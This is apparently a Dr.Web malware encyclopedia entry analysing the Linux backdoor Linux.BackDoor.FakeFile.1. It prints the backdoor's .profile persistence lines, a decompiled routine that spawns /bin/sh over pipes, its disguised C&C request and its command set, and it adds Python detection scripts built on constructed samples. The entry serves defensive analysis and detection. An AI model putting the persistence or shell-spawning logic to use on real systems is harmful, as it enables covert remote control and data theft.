Linux.BackDoor.FakeFile.1

Added to the Dr.Web virus database: 2016-10-14

Virus description added:

SHA1:

  • 0138fc4d50c734e288388f7c8cbbea5e2ad08a8b

A backdoor for Linux. Upon launching, it copies itself to the file

<HOME>/.gconf/apps/gnome-common/gnome-common

It then searches for a hidden file whose name matches the Trojan's own file name and replaces its executable with that file. For instance, if the ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan looks for a hidden file named .AnyName.pdf and replaces the original file with it using the command mv.

If the file is found, the Trojan opens it in the application that corresponds to its extension:

Extension                                      Application
.doc .DOC .xls .XLS .ppt .PPT .docx .DOCX
.xlsx .XLSX .pptx .PPTX .odt .ODT
.ods .ODS .odp .ODP                            soffice
.pdf .PDF                                      evince
all other extensions                           gedit

If the file is absent, the Trojan creates it and opens it in gedit. The Trojan then checks the name of the Linux distribution installed on the device: if the name is anything other than openSUSE, Linux.BackDoor.FakeFile.1 appends the following lines to the file <HOME>/.profile or the file <HOME>/.bash_profile:

# if execute the gnome-common
if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then
    "$HOME/.gconf/apps/gnome-common/gnome-common"
fi
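The dropped-file path, the published SHA1 and the profile lines above give a defender three host-side indicators. The script below is an added example written for this page, not Dr.Web code: it checks one home directory for the copy under .gconf/apps/gnome-common/, hashes it against the SHA1 listed above, and searches .profile and .bash_profile for the inserted lines. The home directory it builds in build_demo_home is constructed, with a placeholder file standing in for the real binary, so the hash is reported as unknown rather than as a match.

```python
"""Host-side indicator check for the Linux.BackDoor.FakeFile.1 artifacts
described above. Added example, not Dr.Web code. The path, hash and profile
lines come from the description; the sample home directory is constructed."""
import hashlib
import os
import tempfile

# Indicators taken from the description above.
DROPPED_REL_PATH = os.path.join(".gconf", "apps", "gnome-common", "gnome-common")
KNOWN_SHA1 = "0138fc4d50c734e288388f7c8cbbea5e2ad08a8b"
PERSISTENCE_MARKERS = (
    "# if execute the gnome-common",
    '"$HOME/.gconf/apps/gnome-common/gnome-common"',
)
PROFILE_FILES = (".profile", ".bash_profile")


def sha1_of_file(path):
    """Return the hex SHA1 of a file, streamed so large files are fine."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_profiles(home):
    """Return (profile_path, line_no, line) for every persistence marker hit."""
    hits = []
    for name in PROFILE_FILES:
        path = os.path.join(home, name)
        if not os.path.isfile(path):
            continue
        with open(path, "r", errors="replace") as f:
            for no, line in enumerate(f, 1):
                if any(marker in line for marker in PERSISTENCE_MARKERS):
                    hits.append((path, no, line.rstrip("\n")))
    return hits


def scan_home(home):
    """Collect findings for one home directory as a list of strings."""
    findings = []
    dropped = os.path.join(home, DROPPED_REL_PATH)
    if os.path.isfile(dropped):
        digest = sha1_of_file(dropped)
        verdict = "matches known sample" if digest == KNOWN_SHA1 else "unknown hash"
        findings.append(f"dropped file present: {dropped} (sha1={digest}, {verdict})")
    for path, no, line in scan_profiles(home):
        findings.append(f"persistence line in {path}:{no}: {line}")
    return findings


def build_demo_home():
    """Constructed sample home directory: a placeholder file (not the real
    sample, so its hash will not match) plus a .profile with the inserted lines."""
    home = tempfile.mkdtemp(prefix="fakefile-demo-")
    os.makedirs(os.path.dirname(os.path.join(home, DROPPED_REL_PATH)))
    with open(os.path.join(home, DROPPED_REL_PATH), "wb") as f:
        f.write(b"placeholder, not the malware\n")
    with open(os.path.join(home, ".profile"), "w") as f:
        f.write("export PATH=$HOME/bin:$PATH\n")
        f.write("# if execute the gnome-common\n")
        f.write('if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then\n')
        f.write('    "$HOME/.gconf/apps/gnome-common/gnome-common"\n')
        f.write("fi\n")
    return home


if __name__ == "__main__":
    for finding in scan_home(build_demo_home()):
        print(finding)
```

On a real host, call scan_home on each directory under /home (and on /root); a hash that does not match the listed SHA1 still deserves a look, since a file at that path with profile lines pointing at it is suspicious regardless of the exact build.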

The viewer for the file and the Trojan's own copy are launched as follows (decompiled code):

pipe(v32);                 /* v32: data from the child shell back to the parent */
pipe(v31);                 /* v31: data from the parent to the child shell's stdin */
status = fork();
if ( !status )
{
  /* child: stdin <- v31 read end, stdout and stderr -> v32 write end */
  close(0);
  dup(v31[0]);
  close(1);
  dup(v32[1]);
  close(2);
  dup(v32[1]);
  close(v32[1]);
  close(v31[0]);
  close(v32[0]);
  close(v31[1]);
  sleep(1u);
  /* become /bin/sh, retrying every second until execl succeeds */
  while ( execl("/bin/sh", "/bin/sh", 0) < 0 )
    sleep(1u);
  exit(status);
}
/* parent: keep the original descriptors, then point stdin/stdout at the pipes */
v50 = dup(0);
v51 = dup(1);
v52 = dup(2);
close(0);
dup(v32[0]);               /* stdin <- the shell's output */
close(1);
dup(v31[1]);               /* stdout -> the shell's stdin */
close(v31[1]);
close(v32[0]);
close(v31[0]);
close(v32[1]);
/* the command line is fed to the shell, followed by a one-byte terminator */
write(1, s1, strlen(s1));
write(1, &unk_8053D40, 1u);

If the Trojan is launched from the path <HOME>/.gconf/apps/gnome-common/gnome-common, it reads the configuration data from its own file and decrypts it. The malware then starts two threads: the first exchanges information with the command and control (C&C) server, and the second monitors the duration of the connection. If the Trojan receives no instructions for more than 30 minutes, the connection is closed. When exchanging information with the C&C server, the server's replies are disguised as HTTP requests that look as follows:

GET /index.asp?title=Welcome&picture=welcome.gif<encrypted string> HTTP/1.0
Host: <IP address of a victim>
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Accept: */*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
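The request shape above can be turned into a network-side check. The parser below is an added example (not Dr.Web code): it splits a raw request into its request line and header pairs, keeping duplicate headers rather than collapsing them, and reports which of the beacon's characteristics are present: the fixed path prefix, the opaque string appended directly after the .gif name, the duplicated User-Agent header, and the Windows 98 / MSIE 5.00 user agent that is out of place coming from a Linux host. SAMPLE_BEACON and SAMPLE_BENIGN are constructed; the appended string in SAMPLE_BEACON is a placeholder standing in for the encrypted data.

```python
"""Flag HTTP requests that match the Linux.BackDoor.FakeFile.1 beacon shape
shown above. Added example, not Dr.Web code; sample requests are constructed."""

BEACON_PATH_PREFIX = "/index.asp?title=Welcome&picture=welcome.gif"
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"

# Constructed sample: the page's request with a placeholder where the
# encrypted string would be and a documentation-range host address.
SAMPLE_BEACON = (
    "GET /index.asp?title=Welcome&picture=welcome.gifQkVBQ09OLVBMQUNFSE9MREVS HTTP/1.0\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    "User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)\r\n"
    "Pragma: no-cache\r\n"
    "\r\n"
)

# Constructed benign request sharing only the title parameter.
SAMPLE_BENIGN = (
    "GET /index.asp?title=Welcome HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: */*\r\n"
    "\r\n"
)


def parse_request(raw):
    """Return (method, target, version, headers); headers is a list of
    (lowercased name, value) pairs so repeated headers survive."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, version, headers


def beacon_indicators(raw):
    """Return the list of beacon characteristics found in one raw request."""
    method, target, version, headers = parse_request(raw)
    hits = []
    if method == "GET" and target.startswith(BEACON_PATH_PREFIX):
        hits.append("beacon path prefix")
        tail = target[len(BEACON_PATH_PREFIX):]
        if tail:
            # Anything glued onto the .gif name is the opaque payload.
            hits.append(f"opaque string appended to path ({len(tail)} chars)")
    user_agents = [value for name, value in headers if name == "user-agent"]
    if len(user_agents) > 1:
        hits.append("duplicate User-Agent header")
    if BEACON_UA in user_agents:
        hits.append("Windows 98 / MSIE 5.00 user agent")
    return hits


if __name__ == "__main__":
    for label, sample in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(label, beacon_indicators(sample))
```

Any one indicator alone is weak; the path prefix with a non-empty tail is the most specific, and the duplicated User-Agent is a cheap corroborating signal for proxy or IDS rules.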

Linux.BackDoor.FakeFile.1 can execute the following commands:

Name   Function
RR     Send the C&C server the number of messages transferred during the session
DR     Send a listing of the contents of the specified folder
DF     Send the C&C server the specified file, or a folder with all its contents
D1     Delete a file using the command rm -r
D0     Delete a file using the command unlink
RF     Rename a folder
US     Remove itself
RP     Launch a new copy of the process
QQ     Close the current session
RT     Establish a backconnect and run sh
CP     Terminate the backdoor's operation
FF     Open the executable file of the process for writing
CO     Close the process file
BF     Create a file or folder
FD     Write the transmitted values to a file
EF     Obtain the directory listing using the command ls
CX     Set 777 permissions on the specified file
CR     Terminate the backconnect

Treatment recommendations

Linux

Please run a full scan of all disk partitions using Dr.Web Antivirus for Linux.


© Doctor Web
2003 — 2019

Doctor Web is a Russian developer of the Dr.Web antivirus solutions. Doctor Web has been developing Dr.Web products since 1992.

333b, Avenue de Colmar, 67100 Strasbourg